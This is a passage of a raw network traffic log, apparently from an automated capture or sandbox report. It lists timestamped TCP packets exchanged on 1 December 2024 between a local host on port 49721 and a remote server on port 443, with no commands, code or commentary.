                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.458365917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.458429098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.458435059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.458467960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.458467960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.465373993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.465398073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.465456009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.465456009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.465462923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.465522051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.473406076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.473437071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.473479033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.473484993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.473495007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.473531008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.481332064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.481350899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.481431961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.481431961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.481439114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.481473923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.488715887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.488734961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.488795996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.488802910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.488826036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.488859892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.553268909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.553287983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.553380966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.553390980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.553436995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.643474102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.643492937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.643572092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.643585920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.643696070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.650780916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.650796890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.650856972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.650865078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.650887012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.650916100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.658421993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.658437967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.658516884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.658524036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.658617020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.664633036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.664649963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.664697886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.664705038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.664747000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.664747000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.672121048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.672139883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.672197104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.672203064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.672226906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.672267914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.679728031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.679745913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.679852962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.679858923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.679902077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.686597109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.686616898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.686695099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.686701059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.686754942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.754210949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.754231930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.754306078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.754323959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.754369974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.845329046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.845350027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.845455885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.845465899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.845524073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.852596998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.852615118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.852704048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.852713108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.852751970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.859766006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.859785080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.859842062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.859848022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.859942913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.866537094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.866554976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.866661072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.866668940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.866719007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.873519897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.873539925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.873600006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.873605967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.873616934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.873675108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.881679058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.881697893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.881750107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.881755114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.881798029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.881798029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.887329102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.887351990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.887423992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.887430906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.887481928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.955286026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.955306053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.955416918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.955427885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:34.955493927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.050574064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.050595045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.050733089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.050741911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.050781012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.057733059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.057749033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.057856083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.057863951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.057918072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.064882994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.064898014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.064980030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.064986944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.065042973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.072120905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.072138071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.072206974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.072212934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.072259903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.078427076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.078444958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.078494072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.078500032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.078665972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.078665972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.085565090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.085581064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.085659027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.085665941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.085747957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.092797995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.092820883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.092875004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.092883110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.092936993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.092937946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.183257103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.183276892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.183341980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.183351040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.183387041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.199651957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.252722979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.252744913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.252815008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.252825975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.252844095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.252857924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.259068012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.259083986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.259191036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.259201050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.259248018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.266098022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.266113043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.266191959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.266200066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.266433954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.273351908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.273370981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.273442030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.273449898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.273509979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.279655933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.279673100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.279751062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.279759884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.279800892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.286916018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.286937952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.286998987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.287008047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.287053108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.294045925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.294061899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.294137001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.294145107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.294190884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.384111881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.384134054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.384197950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.384207010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.384244919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.384258032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.453700066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.453717947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.453769922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.453778028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.453804970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.453804970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.460419893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.460438967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.460536003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.460544109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.460587978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.467668056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.467684031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.467742920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.467751980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.467797041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.475455046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.475471973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.475538015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.475544930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.475591898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.481215954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.481231928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.481313944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.481322050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.481383085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.485714912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.489754915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.489773035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.489844084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.489851952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.489903927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.495132923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.495148897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.495204926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.495210886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.495240927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.495248079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.585217953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.585238934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.585298061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.585313082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.585349083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.585364103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.655441999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.655467987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.655507088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.655514956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.655571938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.662127018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.662142038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.662199974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.662210941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.662269115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.675597906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.675616980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.675666094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.675673962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.675714016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.675714016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.681777954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.681793928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.681859970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.681866884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.681914091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.689130068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.689146996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:35.689218998 CET49721443192.168.2.6142.132.252.48
